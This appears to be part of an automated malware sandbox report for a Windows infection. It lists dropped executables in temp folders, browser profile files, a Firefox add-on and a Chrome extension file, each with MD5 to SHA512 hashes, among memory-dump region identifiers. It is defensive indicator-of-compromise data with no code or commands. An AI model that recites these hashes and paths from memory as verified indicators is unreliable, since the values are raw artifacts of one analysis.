C:\Users\Admin\AppData\Local\Temp\Scott
| MD5 | 7e600368be6cc5c03b1bf613a36885d1 |
| SHA1 | c0cc74598ef38940fc48ccb01fa27e9b27e80e62 |
| SHA256 | 0b4bfde6485d29cba34de2cd28191b5fc21dfcd3aca109f68599e19a609cbe44 |
| SHA512 | b6b66babcadd81d4e4e5b62e778ea79acc2a48b9c0ab9bf81a7ec61f9f9ccf394bc16982b80f07b113645a24f209d68cddc733266d0f0e3d722567f120d425cc |
C:\Users\Admin\AppData\Local\Temp\193997\y
| MD5 | d6a0473754ad77650d88eaa94cf4bcf0 |
| SHA1 | d2123bf8b796fe6f76e570641037d9420b3f3c78 |
| SHA256 | 355d2dc53492ea6ba26263dd8a2f7544ae3a36c17f64cccb6ad84007bebafbb7 |
| SHA512 | 14d844255fb657a039d4f94ddcc58acc79d44fdc58882ace49a453c537db86ceeef9a10640d83ff20af2caa0e880de3e77b7afbf2af79291873c0f81db72d3bc |
memory/2224-194-0x0000000000400000-0x0000000000C37000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/3204-201-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-202-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-203-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/2224-204-0x0000000000400000-0x0000000000C37000-memory.dmp
memory/3204-205-0x00000000006A0000-0x0000000000B4D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
memory/456-212-0x00000000004F0000-0x000000000054B000-memory.dmp
memory/3076-213-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-214-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-215-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-216-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-217-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-218-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3204-219-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3076-220-0x0000000000030000-0x000000000009F000-memory.dmp
memory/456-221-0x00000000004F0000-0x000000000054B000-memory.dmp
memory/456-223-0x00000000004F0000-0x000000000054B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe
| MD5 | 67846d1862f63942b00eb61e47be2652 |
| SHA1 | a018b557975a35fa8c001a43a55d08cef7d426f2 |
| SHA256 | b8df70d0227e4277fa8e1e2efe6f86c4c087f60a68744aa89df83d1cdd15253f |
| SHA512 | 5dc36ebb7b3148c23f0e248971d04519587f7da0ff9320a85f64ddf1e9b10e907aa7d88feec725b385e514816c829d375b01f91d4c64d3c0ae6664a9d5906150 |
memory/3076-233-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-239-0x0000000000030000-0x000000000009F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe
| MD5 | 62910a92441aac7a282513aeb9f6fd6a |
| SHA1 | eeaae9e540a7f4210975318da5742ee01c77f3ff |
| SHA256 | adcbe92d574ca3cde6796fa43663a9c042be98c80cdb8181001f3d4161df05c4 |
| SHA512 | d0702fa3c50768074425425fb4bce9f678ce5c97764d39be718f250b5d441dd1cc250ed3feaa1337af2739d9a87d5a8850b69ebebb149bcc2d17887bd0334971 |
memory/3076-253-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-262-0x0000000000030000-0x000000000009F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5FB.tmp\Install.exe
| MD5 | 79120912ad03b169e423624a28649c98 |
| SHA1 | 6914f4082bfd0904404138a74273be4b024b9bef |
| SHA256 | 0da4ea8790028db008943f30563a65e43f4a42a51404d9cb26730ab7dac94f98 |
| SHA512 | 79241ca18e19add662a8531d5d4935521d7d9e6dbd0dd559aaffbb231989aaf68e4cc39eeec82b06dde766c5b52fdd98661322156d2b626e472a3fd7fba512f7 |
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe
| MD5 | 5a5bbf5d5fe247f380ab26ae580ecff4 |
| SHA1 | 51bfa443888bbaf2e81ae783691fa00e979e1c7a |
| SHA256 | b81aa596296218a3cbc2c51287b90dbec46b3312b376d6d43bac6f397fac1517 |
| SHA512 | 12a472b94748343dffd86ac722c0c021eb91872a67e35cd0b920cbe33e2d6f629f281ba8708aaeba228c5b551900d9ff9105becd2d83f066eb92dd878c8a48bc |
memory/1792-277-0x0000000000A50000-0x00000000010F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe
| MD5 | f9a4f6684d1bf48406a42921aebc1596 |
| SHA1 | c9186ff53de4724ede20c6485136b4b2072bb6a6 |
| SHA256 | e0a051f93d4c1e81cc142181d14249e246be4c169645d667267134b664e75042 |
| SHA512 | 67294a47dfef6aba404939497c403f93318841e9c5ee28b706f7506b5dff2630381e28e86f6dcbfdff2427092a515db1dc0a04e334e7f8de8b0b682269ff88fd |
memory/3076-286-0x0000000000030000-0x000000000009F000-memory.dmp
memory/3076-292-0x0000000000030000-0x000000000009F000-memory.dmp
memory/2920-295-0x0000000002CA0000-0x0000000002CD6000-memory.dmp
memory/2920-296-0x0000000005790000-0x0000000005DB8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe
| MD5 | 1873f27a43f63c02800d6c80014c0235 |
| SHA1 | 3441bba24453db09fb56e02a9d56cdf775886f07 |
| SHA256 | 4bfcba248d79dfd6c2cba52d7c9ee18842f007bfa0e3ba99ababacb4794e8c6e |
| SHA512 | 9f2b663afc1cc3dbc8eba3278f61ffb41c19e42f94ee4c8a60eff83c8846b81d34e4ff869b643434a8ad5657c46bd06a712f0598062b62802ba6f0ee6f4fb8f2 |
memory/2920-305-0x0000000005610000-0x0000000005632000-memory.dmp
memory/2920-307-0x0000000005F30000-0x0000000005F96000-memory.dmp
memory/2920-310-0x0000000005FA0000-0x0000000006006000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tcev1o55.wn2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3076-314-0x0000000000030000-0x000000000009F000-memory.dmp
memory/2920-325-0x0000000006010000-0x0000000006364000-memory.dmp
memory/3076-306-0x0000000000030000-0x000000000009F000-memory.dmp
memory/2920-326-0x00000000065C0000-0x00000000065DE000-memory.dmp
memory/2920-327-0x00000000065F0000-0x000000000663C000-memory.dmp
memory/2920-328-0x0000000006B30000-0x0000000006BC6000-memory.dmp
memory/2920-329-0x0000000006AB0000-0x0000000006ACA000-memory.dmp
memory/2920-330-0x0000000006B00000-0x0000000006B22000-memory.dmp
memory/2920-331-0x0000000007D30000-0x00000000082D4000-memory.dmp
memory/3204-334-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/1792-335-0x0000000010000000-0x00000000105D5000-memory.dmp
memory/3636-348-0x0000000006460000-0x00000000067B4000-memory.dmp
memory/3636-349-0x0000000006E50000-0x0000000006E9C000-memory.dmp
memory/1080-353-0x0000000000400000-0x0000000000C2D000-memory.dmp
memory/3204-355-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/1080-356-0x0000000000400000-0x0000000000C2D000-memory.dmp
memory/2924-367-0x0000000000400000-0x0000000002860000-memory.dmp
memory/3204-368-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/5060-369-0x0000000000A50000-0x00000000010F8000-memory.dmp
memory/1792-370-0x0000000000A50000-0x00000000010F8000-memory.dmp
memory/3664-371-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3664-373-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/5060-375-0x0000000010000000-0x00000000105D5000-memory.dmp
memory/3204-387-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/4284-389-0x0000000004A00000-0x0000000004A4C000-memory.dmp
memory/1996-415-0x0000000000400000-0x0000000002860000-memory.dmp
memory/4176-420-0x000001EACA690000-0x000001EACA6B2000-memory.dmp
memory/3204-432-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3484-433-0x0000000000400000-0x0000000002860000-memory.dmp
memory/1996-434-0x0000000000400000-0x0000000002860000-memory.dmp
memory/3204-435-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/5060-436-0x0000000000A50000-0x00000000010F8000-memory.dmp
memory/3964-440-0x00000000002F0000-0x0000000000998000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\170637797568
| MD5 | 0c5bb1605df7dbc457378472c0a73518 |
| SHA1 | 14608ed3aee6033eaddba0e1d422df776d84e673 |
| SHA256 | d4978f007c3009c008b69838ef75e47abf0011ec71089b0801c9745f4ef659ac |
| SHA512 | 9e62a50448677c9084fa3164cfb8ae6283bcdb76340b7483ee6e2d27c8e813b3b107216e58e91d129a8ec40f0bba817b502c021cd428f47dd07cc81c5be3df4e |
memory/3204-456-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3964-457-0x0000000010000000-0x00000000105D5000-memory.dmp
memory/4180-472-0x0000000004ED0000-0x0000000004F1C000-memory.dmp
memory/3964-479-0x0000000002760000-0x00000000027E5000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 6f3060dab86d0e1632d896afe7ddd104 |
| SHA1 | a178451339e8ff086dcbb14679686c0630a6a226 |
| SHA256 | 716639310f3fac0ed0f5c99ab8a54e7f01197e77bc77ae665e4eea024a9e780b |
| SHA512 | 971da8c03301d7f90481ffa90ab957571176abfddc106e99c96c3ec4b9e4d659437efb07e1d759685bc220fb72e570880ba10bfb4febdf4768201ef046b19d86 |
memory/1996-516-0x0000000000400000-0x0000000002860000-memory.dmp
memory/3204-517-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-525-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3964-526-0x00000000002F0000-0x0000000000998000-memory.dmp
memory/4552-527-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/4552-529-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-531-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3964-532-0x00000000024E0000-0x0000000002547000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |